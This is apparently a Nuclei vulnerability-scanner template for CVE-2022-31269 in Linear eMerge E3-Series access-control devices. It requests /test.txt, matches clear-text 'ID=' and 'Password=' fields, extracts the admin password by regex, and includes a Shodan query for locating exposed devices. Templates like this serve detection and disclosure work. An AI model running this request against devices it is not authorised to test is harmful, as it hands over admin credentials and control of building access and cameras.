id: CVE-2022-31269

info:
  name: Linear eMerge E3-Series - Information Disclosure
  author: For3stCo1d
  severity: high
  description: |
    Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
  reference:
    - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
    - https://www.nortekcontrol.com/access-control/
    - https://eg.linkedin.com/in/omar-1-hashem
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2022-31269
    cwe-id: CWE-798
  metadata:
    shodan-query: http.title:"Linear eMerge"
    verified: "true"
  tags: cve2022,emerge,exposure,packetstorm,cve

requests:
  - method: GET
    path:
      - "{{BaseURL}}/test.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ID="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - text/plain

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - Password='(.+?)'

# Enhanced by md on 2023/02/03